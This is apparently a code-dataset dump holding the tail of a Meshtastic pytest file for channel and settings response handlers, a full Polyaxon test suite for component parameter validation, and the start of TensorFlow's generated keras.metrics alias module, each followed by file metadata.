# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart5', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
@pytest.mark.unit
def test_onResponseRequestChannel(caplog):
"""Test onResponseRequestChannel()"""
# Build a fake primary channel and a disabled channel; each is attached to a
# mocked AdminMessage so the handler can read it via get_channel_response.
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
msg1 = MagicMock(autospec=AdminMessage)
msg1.get_channel_response = channel1
msg2 = MagicMock(autospec=AdminMessage)
channel2 = Channel(index=2, role=0) # disabled
msg2.get_channel_response = channel2
# default primary channel
packet1 = {
'from': 2475227164,
'to': 2475227164,
'decoded': {
'portnum': 'ADMIN_APP',
'payload': b':\t\x12\x05\x18\x03"\x01\x01\x18\x01',
'requestId': 2615094405,
'admin': {
'getChannelResponse': {
'settings': {
'modemConfig': 'Bw125Cr48Sf4096',
'psk': 'AQ=='
},
'role': 'PRIMARY'
},
'raw': msg1,
}
},
'id': 1692918436,
'hopLimit': 3,
'priority':
'RELIABLE',
'raw': 'fake',
'fromId': '!9388f81c',
'toId': '!9388f81c'
}
# no other channels
packet2 = {
'from': 2475227164,
'to': 2475227164,
'decoded': {
'portnum': 'ADMIN_APP',
'payload': b':\x04\x08\x02\x12\x00',
'requestId': 743049663,
'admin': {
'getChannelResponse': {
'index': 2,
'settings': {}
},
'raw': msg2,
}
},
'id': 1692918456,
'rxTime': 1640202239,
'hopLimit': 3,
'priority': 'RELIABLE',
'raw': 'faked',
'fromId': '!9388f81c',
'toId': '!9388f81c'
}
# Mock out the serial interface so no real device is needed.
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
# Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
mo.localNode = anode
with caplog.at_level(logging.DEBUG):
# Kick off the config download, then feed the two channel responses back;
# receiving a disabled channel ends the download and pads to max_channels.
anode.requestConfig()
anode.onResponseRequestChannel(packet1)
assert re.search(r'Received channel', caplog.text, re.MULTILINE)
anode.onResponseRequestChannel(packet2)
assert re.search(r'Received channel', caplog.text, re.MULTILINE)
assert re.search(r'Finished downloading channels', caplog.text, re.MULTILINE)
# The channel table is padded out to the full 8 slots.
assert len(anode.channels) == 8
assert anode.channels[0].settings.modem_config == 3
assert anode.channels[1].settings.name == ''
assert anode.channels[2].settings.name == ''
assert anode.channels[3].settings.name == ''
assert anode.channels[4].settings.name == ''
assert anode.channels[5].settings.name == ''
assert anode.channels[6].settings.name == ''
assert anode.channels[7].settings.name == ''
@pytest.mark.unit
def test_onResponseRequestSetting(caplog):
"""Test onResponseRequestSetting()"""
# Note: Split out the get_radio_response to a MagicMock
# so it could be "returned" (not really sure how to do that
# in a python dict.
amsg = MagicMock(autospec=AdminMessage)
amsg.get_radio_response = """{
preferences {
phone_timeout_secs: 900
ls_secs: 300
position_broadcast_smart: true
position_flags: 35
}
}"""
packet = {
'from': 2475227164,
'to': 2475227164,
'decoded': {
'portnum': 'ADMIN_APP',
'payload': b'*\x0e\n\x0c0\x84\x07P\xac\x02\x88\x01\x01\xb0\t#',
'requestId': 3145147848,
'admin': {
'getRadioResponse': {
'preferences': {
'phoneTimeoutSecs': 900,
'lsSecs': 300,
'positionBroadcastSmart': True,
'positionFlags': 35
}
},
'raw': amsg
},
# NOTE(review): 'id'/'rxTime'/'hopLimit'/... are nested inside 'decoded'
# here, unlike packet1 in test_onResponseRequestChannel where they are
# top-level keys. Possibly an unintended fixture misnesting — confirm
# whether onResponseRequestSettings only reads decoded.admin/routing.
'id': 365963704,
'rxTime': 1640195197,
'hopLimit': 3,
'priority': 'RELIABLE',
'raw': 'faked',
'fromId': '!9388f81c',
'toId': '!9388f81c'
}
}
# Mock out the serial interface so no real device is needed.
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
# Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
mo.localNode = anode
with caplog.at_level(logging.DEBUG):
anode.onResponseRequestSettings(packet)
assert re.search(r'Received radio config, now fetching channels..', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_onResponseRequestSetting_with_error(capsys):
"""Test onResponseRequestSetting() with an error"""
# The 'routing'/'errorReason' entry makes the handler take its error path.
packet = {
'from': 2475227164,
'to': 2475227164,
'decoded': {
'portnum': 'ADMIN_APP',
'payload': b'*\x0e\n\x0c0\x84\x07P\xac\x02\x88\x01\x01\xb0\t#',
'requestId': 3145147848,
'routing': {
'errorReason': 'some made up error',
},
'admin': {
'getRadioResponse': {
'preferences': {
'phoneTimeoutSecs': 900,
'lsSecs': 300,
'positionBroadcastSmart': True,
'positionFlags': 35
}
},
},
# NOTE(review): as in test_onResponseRequestSetting, these keys sit inside
# 'decoded' rather than at the packet top level — confirm this is intended.
'id': 365963704,
'rxTime': 1640195197,
'hopLimit': 3,
'priority': 'RELIABLE',
'fromId': '!9388f81c',
'toId': '!9388f81c'
}
}
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
# Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
mo.localNode = anode
anode.onResponseRequestSettings(packet)
out, err = capsys.readouterr()
assert re.search(r'Error on response', out)
assert err == ''
@pytest.mark.unitslow
def test_waitForConfig():
    """waitForConfig should report failure when the timeout expires."""
    anode = Node('foo', 'bar')
    anode.radioConfig = RadioConfig()
    # tiny timeout so the wait gives up almost immediately
    anode._timeout = Timeout(0.01)
    assert not anode.waitForConfig()
| 37.413217
| 129
| 0.638282
| 5,807
| 51,518
| 5.578956
| 0.069399
| 0.039633
| 0.022502
| 0.036114
| 0.837732
| 0.813038
| 0.767201
| 0.754669
| 0.734358
| 0.703491
| 0
| 0.046925
| 0.233918
| 51,518
| 1,376
| 130
| 37.440407
| 0.773938
| 0.395745
| 0
| 0.70614
| 0
| 0.017544
| 0.136517
| 0.067717
| 0
| 0
| 0
| 0.000727
| 0.21345
| 1
| 0.05117
| false
| 0
| 0.01462
| 0
| 0.065789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a29aab0484a185cc6accc0bad4ad157726655fb
| 25,921
|
py
|
Python
|
core/tests/test_polyflow/test_components/test_components.py
|
admariner/polyaxon
|
ba355c38166047eb11e60de4cee4d7c3b48db323
|
[
"Apache-2.0"
] | 3,200
|
2017-05-09T11:35:31.000Z
|
2022-03-28T05:43:22.000Z
|
core/tests/test_polyflow/test_components/test_components.py
|
admariner/polyaxon
|
ba355c38166047eb11e60de4cee4d7c3b48db323
|
[
"Apache-2.0"
] | 1,324
|
2017-06-29T07:21:27.000Z
|
2022-03-27T12:41:10.000Z
|
core/tests/test_polyflow/test_components/test_components.py
|
admariner/polyaxon
|
ba355c38166047eb11e60de4cee4d7c3b48db323
|
[
"Apache-2.0"
] | 341
|
2017-01-10T23:06:53.000Z
|
2022-03-10T08:15:18.000Z
|
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from marshmallow import ValidationError
from polyaxon import types
from polyaxon.polyflow import V1Component, V1RunKind, ops_params
from polyaxon.utils.tz_utils import local_datetime, now
from tests.utils import BaseTestCase
@pytest.mark.components_mark
class TestComponentsConfigs(BaseTestCase):
    """Tests for V1Component deserialization and params validation.

    Covers two layers:
      * schema-level validation via ``V1Component.from_dict`` (rejecting
        malformed component dicts), and
      * ``ops_params.validate_params`` checks of concrete params against a
        component's declared inputs/outputs (type coercion, missing/extra
        params, run references).
    """

    def test_passing_params_declarations_raises(self):
        """Providing both ``params`` and ``declarations`` is rejected."""
        config_dict = {
            "params": {"foo": {"value": "bar"}},
            "declarations": {"foo": "bar"},
        }
        with self.assertRaises(ValidationError):
            V1Component.from_dict(config_dict)

    def test_passing_wrong_params(self):
        """Param entries must be dicts (e.g. ``{"value": ...}``), not bare strings."""
        config_dict = {"params": {"foo": "bar"}}
        with self.assertRaises(ValidationError):
            V1Component.from_dict(config_dict)

    # NOTE(review): this test is byte-identical to test_passing_wrong_params
    # above — likely a leftover duplicate; consider removing it or giving it
    # a distinct scenario.
    def test_passing_params_raises(self):
        """Param entries must be dicts (e.g. ``{"value": ...}``), not bare strings."""
        config_dict = {"params": {"foo": "bar"}}
        with self.assertRaises(ValidationError):
            V1Component.from_dict(config_dict)

    def test_param_validation_with_inputs(self):
        """Params matching declared input types validate and round-trip; missing required inputs raise."""
        config_dict = {
            "inputs": [
                {"name": "param1", "type": types.STR},
                {"name": "param2", "type": types.INT},
                {"name": "param3", "type": types.FLOAT},
                {"name": "param4", "type": types.BOOL},
                {"name": "param5", "type": types.DICT},
                {"name": "param6", "type": types.LIST},
                {"name": "param7", "type": types.GCS},
                {"name": "param8", "type": types.S3},
                {"name": "param9", "type": types.WASB},
                {"name": "param10", "type": types.PATH},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        component = V1Component.from_dict(config_dict)
        params = {
            "param1": {"value": "text"},
            "param2": {"value": 12},
            "param3": {"value": 13.3},
            "param4": {"value": False},
            "param5": {"value": {"foo": "bar"}},
            "param6": {"value": [1, 3, 45, 5]},
            "param7": {"value": "gs://bucket/path/to/blob/"},
            "param8": {"value": "s3://test/this/is/bad/key.txt"},
            "param9": {"value": "wasbs://container@user.blob.core.windows.net/"},
            "param10": {"value": "/foo/bar"},
        }
        validated_params = ops_params.validate_params(
            params=params, inputs=component.inputs, outputs=None, is_template=False
        )
        # Validation should be lossless: the validated params reproduce the input.
        assert params == {p.name: {"value": p.param.value} for p in validated_params}
        # Passing missing params
        params.pop("param1")
        params.pop("param2")
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params=params, inputs=component.inputs, outputs=None, is_template=False
            )

    def test_param_validation_with_outputs(self):
        """Output params validate like inputs, but missing ones default to None instead of raising."""
        config_dict = {
            "outputs": [
                {"name": "param1", "type": types.STR},
                {"name": "param2", "type": types.INT},
                {"name": "param3", "type": types.FLOAT},
                {"name": "param4", "type": types.BOOL},
                {"name": "param5", "type": types.DICT},
                {"name": "param6", "type": types.LIST},
                {"name": "param7", "type": types.GCS},
                {"name": "param8", "type": types.S3},
                {"name": "param9", "type": types.WASB},
                {"name": "param10", "type": types.PATH},
                {"name": "param11", "type": types.METRIC},
                {"name": "param12", "type": types.METADATA},
                {"name": "param13", "type": types.METADATA},
                {"name": "param14", "type": types.METADATA},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        component = V1Component.from_dict(config_dict)
        params = {
            "param1": {"value": "text"},
            "param2": {"value": 12},
            "param3": {"value": 13.3},
            "param4": {"value": False},
            "param5": {"value": {"foo": "bar"}},
            "param6": {"value": [1, 3, 45, 5]},
            "param7": {"value": "gs://bucket/path/to/blob/"},
            "param8": {"value": "s3://test/this/is/bad/key.txt"},
            "param9": {"value": "wasbs://container@user.blob.core.windows.net/"},
            "param10": {"value": "/foo/bar"},
            "param11": {"value": 124.4},
            "param12": {"value": {"foo": 124.4}},
            "param13": {"value": {"foo": "bar"}},
            "param14": {"value": {"foo": ["foo", 124.4]}},
        }
        validated_params = ops_params.validate_params(
            params=params, inputs=None, outputs=component.outputs, is_template=False
        )
        assert params == {p.name: {"value": p.param.value} for p in validated_params}
        # Passing missing params
        params.pop("param1")
        params.pop("param2")
        validated_params = ops_params.validate_params(
            params=params, inputs=None, outputs=component.outputs, is_template=False
        )
        # Missing outputs are tolerated and surface back as None values.
        params["param1"] = {"value": None}
        params["param2"] = {"value": None}
        assert params == {p.name: {"value": p.param.value} for p in validated_params}

    def test_required_input_no_param_only_validated_on_run(self):
        """A missing required *input* raises; a missing *output* does not."""
        # Inputs
        config_dict = {
            "inputs": [
                {"name": "param1", "type": types.STR},
                {"name": "param10", "type": types.PATH},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": "text"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        # Outputs
        config_dict = {
            "outputs": [
                {"name": "param1", "type": types.STR},
                {"name": "param10", "type": types.PATH},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        ops_params.validate_params(
            params={"param1": {"value": "text"}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        # IO
        config_dict = {
            "inputs": [{"name": "param1", "type": types.STR}],
            "outputs": [{"name": "param10", "type": types.PATH}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        ops_params.validate_params(
            params={"param1": {"value": "text"}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )

    def test_incomplete_params(self):
        """Unsatisfied required inputs raise; outputs with defaults (isOptional) do not."""
        config_dict = {
            "inputs": [
                {"name": "param1", "type": types.INT},
                {"name": "param2", "type": types.INT},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": 1}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        config_dict = {
            "outputs": [
                {"name": "param1", "type": types.INT, "value": 12, "isOptional": True},
                {"name": "param2", "type": types.INT},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        ops_params.validate_params(
            params={"param1": {"value": 1}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )

    def test_extra_params(self):
        """Params not declared as inputs or outputs are rejected."""
        # inputs
        config_dict = {
            "inputs": [{"name": "param1", "type": types.INT}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": 1}, "param2": {"value": 2}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        # outputs
        config_dict = {
            "outputs": [{"name": "param1", "type": types.INT}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": 1}, "param2": {"value": 2}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )

    def test_param_validation_with_mismatched_inputs(self):
        """Type coercion rules for INT/FLOAT/WASB inputs: compatible values pass, others raise."""
        config_dict = {
            "inputs": [{"name": "param1", "type": types.INT}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        # Passing correct param
        ops_params.validate_params(
            params={"param1": {"value": 1}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        ops_params.validate_params(
            params={"param1": {"value": "-1"}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        # Whole-valued floats and their string forms coerce to INT.
        ops_params.validate_params(
            params={"param1": {"value": 12.0}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        ops_params.validate_params(
            params={"param1": {"value": "12."}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        ops_params.validate_params(
            params={"param1": {"value": 12.0}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        ops_params.validate_params(
            params={"param1": {"value": "12.0"}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        # Passing wrong type
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": "text"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": 12.1}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": "12.1"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": {"foo": "bar"}}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": "gs://bucket/path/to/blob/"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        config_dict = {
            "inputs": [{"name": "param2", "type": types.FLOAT}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        # Passing correct param
        ops_params.validate_params(
            params={"param2": {"value": 1}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        ops_params.validate_params(
            params={"param2": {"value": False}},  # auto-conversion (int to 0 to 0.0)
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        # Passing wrong type
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param2": {"value": "test"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param2": {"foo": "bar"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param2": {"value": ["gs://bucket/path/to/blob/"]}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        config_dict = {
            "inputs": [{"name": "param7", "type": types.WASB}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        # Passing correct param
        ops_params.validate_params(
            params={
                "param7": {"value": "wasbs://container@user.blob.core.windows.net/"}
            },
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        # Passing wrong param
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param7": {"value": "gs://bucket/path/to/blob/"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param7": {"value": "s3://test/this/is/bad/key.txt"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param7": {"value": 1}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )

    def test_param_validation_with_mismatched_outputs(self):
        """Same type-coercion rules as inputs, exercised against declared outputs."""
        config_dict = {
            "outputs": [{"name": "param1", "type": types.INT}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        # Passing correct param
        ops_params.validate_params(
            params={"param1": {"value": 1}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        ops_params.validate_params(
            params={"param1": {"value": 12.0}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        # Passing wrong type
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": "text"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": 12.1}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": {"foo": "bar"}}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param1": {"value": "gs://bucket/path/to/blob/"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        config_dict = {
            "outputs": [{"name": "param2", "type": types.FLOAT}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        # Passing correct param
        ops_params.validate_params(
            params={"param2": {"value": "1.1"}},
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        ops_params.validate_params(
            params={"param2": {"value": False}},  # auto-conversion (int to 0 to 0.0)
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        # Passing wrong type
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param2": {"value": "test"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param2": {"value": {"foo": "bar"}}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param2": {"value": ["gs://bucket/path/to/blob/"]}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        config_dict = {
            "outputs": [{"name": "param7", "type": types.WASB}],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        # Passing correct param
        ops_params.validate_params(
            params={
                "param7": {"value": "wasbs://container@user.blob.core.windows.net/"}
            },
            inputs=config.inputs,
            outputs=config.outputs,
            is_template=False,
        )
        # Passing wrong param
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param7": {"value": "gs://bucket/path/to/blob/"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param7": {"value": "s3://test/this/is/bad/key.txt"}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params={"param7": {"value": 1}},
                inputs=config.inputs,
                outputs=config.outputs,
                is_template=False,
            )

    def test_experiment_and_job_refs_params(self):
        """Params referencing other runs (`runs.<uuid>`) validate and round-trip via to_dict."""
        config_dict = {
            "inputs": [
                {"name": "param1", "type": types.INT},
                {"name": "param2", "type": types.FLOAT},
                {"name": "param9", "type": types.WASB},
                {"name": "param11", "type": types.METRIC},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        op = V1Component.from_dict(config_dict)
        params = {
            "param1": {
                "ref": "runs.64332180bfce46eba80a65caf73c5396",
                "value": "outputs.foo",
            },
            "param2": {
                "ref": "runs.0de53b5bf8b04a219d12a39c6b92bcce",
                "value": "outputs.foo",
            },
            "param9": {"value": "wasbs://container@user.blob.core.windows.net/"},
            "param11": {
                "ref": "runs.fcc462d764104eb698d3cca509f34154",
                "value": "outputs.accuracy",
            },
        }
        validated_params = ops_params.validate_params(
            params=params, inputs=op.inputs, outputs=None, is_template=False
        )
        assert {p.name: p.param.to_dict() for p in validated_params} == {
            "param1": {
                "ref": "runs.64332180bfce46eba80a65caf73c5396",
                "value": "outputs.foo",
            },
            "param2": {
                "ref": "runs.0de53b5bf8b04a219d12a39c6b92bcce",
                "value": "outputs.foo",
            },
            "param9": {"value": "wasbs://container@user.blob.core.windows.net/"},
            "param11": {
                "ref": "runs.fcc462d764104eb698d3cca509f34154",
                "value": "outputs.accuracy",
            },
        }

    def test_job_refs_params(self):
        """A `job.<name>` ref is invalid outside a pipeline context."""
        config_dict = {
            "inputs": [
                {"name": "param1", "type": types.INT},
                {"name": "param9", "type": types.FLOAT},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        params = {
            "param1": {"ref": "job.A", "value": "outputs.foo"},
            "param9": {"value": 13.1},
        }
        config = V1Component.from_dict(config_dict)
        # Validation outside the context of a pipeline
        with self.assertRaises(ValidationError):
            ops_params.validate_params(
                params=params, inputs=config.inputs, outputs=None, is_template=False
            )

    def test_component_base_attrs(self):
        """Operation-only attrs (concurrency, matrix, schedule) are rejected on components; termination is allowed."""
        config_dict = {
            "concurrency": "foo",
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        with self.assertRaises(ValidationError):
            V1Component.from_dict(config_dict)
        config_dict = {
            "concurrency": 2,
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        with self.assertRaises(ValidationError):
            V1Component.from_dict(config_dict)
        config_dict = {
            "kind": "component",
            "matrix": {
                "concurrency": 2,
                "kind": "mapping",
                "values": [{"a": 1}, {"a": 1}],
            },
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        with self.assertRaises(ValidationError):
            V1Component.from_dict(config_dict)
        config_dict = {
            "kind": "component",
            "matrix": {
                "concurrency": 2,
                "kind": "mapping",
                "values": [{"a": 1}, {"a": 1}],
            },
            "schedule": {
                "kind": "datetime",
                "startAt": local_datetime(now()).isoformat(),
            },
            "termination": {"timeout": 1000},
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        with self.assertRaises(ValidationError):
            V1Component.from_dict(config_dict)
        config_dict = {
            "kind": "component",
            "termination": {"timeout": 1000},
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        # Valid config must round-trip unchanged.
        assert config.to_dict() == config_dict

    def test_component_and_hooks(self):
        """A component with hooks deserializes and round-trips unchanged."""
        config_dict = {
            "kind": "component",
            "hooks": [
                {"trigger": "succeeded", "connection": "connection1", "hubRef": "ref1"},
                {"connection": "connection1", "hubRef": "ref2"},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
        }
        config = V1Component.from_dict(config_dict)
        assert config.to_dict() == config_dict

    def test_component_template(self):
        """A component with a template section deserializes and round-trips unchanged."""
        config_dict = {
            "kind": "component",
            "hooks": [
                {"trigger": "succeeded", "connection": "connection1", "hubRef": "ref2"},
                {"connection": "connection1", "hubRef": "ref2"},
            ],
            "run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
            "template": {
                "description": "This is a template, check the fields",
                "fields": ["actions[1].hubRef", "hooks[0].trigger"],
            },
        }
        config = V1Component.from_dict(config_dict)
        assert config.to_dict() == config_dict
| 37.03
| 88
| 0.509047
| 2,336
| 25,921
| 5.519692
| 0.092038
| 0.044207
| 0.063285
| 0.085621
| 0.890181
| 0.881418
| 0.873895
| 0.865829
| 0.856445
| 0.84233
| 0
| 0.025936
| 0.342541
| 25,921
| 699
| 89
| 37.082976
| 0.730665
| 0.039119
| 0
| 0.743842
| 0
| 0
| 0.157579
| 0.032489
| 0
| 0
| 0
| 0
| 0.067323
| 1
| 0.024631
| false
| 0.004926
| 0.009852
| 0
| 0.036125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a4bfe3c4159df60977b340b9fd5a39892c3e4fd
| 2,095
|
py
|
Python
|
Lib/site-packages/tensorflow/_api/v1/keras/metrics/__init__.py
|
amitdev81296/tensorflow
|
9869739cc142a996432bef4dc91b1f1b165bc27a
|
[
"bzip2-1.0.6"
] | 1
|
2020-07-06T14:18:59.000Z
|
2020-07-06T14:18:59.000Z
|
keras-ResNet50/tensorflow/_api/v1/keras/metrics/__init__.py
|
wuh0007/severless_ML_live
|
088b78b06434583b7443ab877a6cdd80121bb8d1
|
[
"MIT"
] | 4
|
2020-09-26T00:55:50.000Z
|
2022-02-10T01:53:06.000Z
|
keras-ResNet50/tensorflow/_api/v1/keras/metrics/__init__.py
|
wuh0007/severless_ML_live
|
088b78b06434583b7443ab877a6cdd80121bb8d1
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Built-in metrics.
"""

from __future__ import print_function

# Generated alias module: re-exports Keras loss functions (usable as metrics)
# and metric utilities under the public `tf.keras.metrics` namespace.  Each
# loss is exported under its abbreviation plus lowercase / long-name aliases.
from tensorflow.python.keras.losses import KLD
from tensorflow.python.keras.losses import KLD as kld
from tensorflow.python.keras.losses import KLD as kullback_leibler_divergence
from tensorflow.python.keras.losses import MAE
from tensorflow.python.keras.losses import MAE as mae
from tensorflow.python.keras.losses import MAE as mean_absolute_error
from tensorflow.python.keras.losses import MAPE
from tensorflow.python.keras.losses import MAPE as mape
from tensorflow.python.keras.losses import MAPE as mean_absolute_percentage_error
from tensorflow.python.keras.losses import MSE
from tensorflow.python.keras.losses import MSE as mean_squared_error
from tensorflow.python.keras.losses import MSE as mse
from tensorflow.python.keras.losses import MSLE
from tensorflow.python.keras.losses import MSLE as mean_squared_logarithmic_error
from tensorflow.python.keras.losses import MSLE as msle
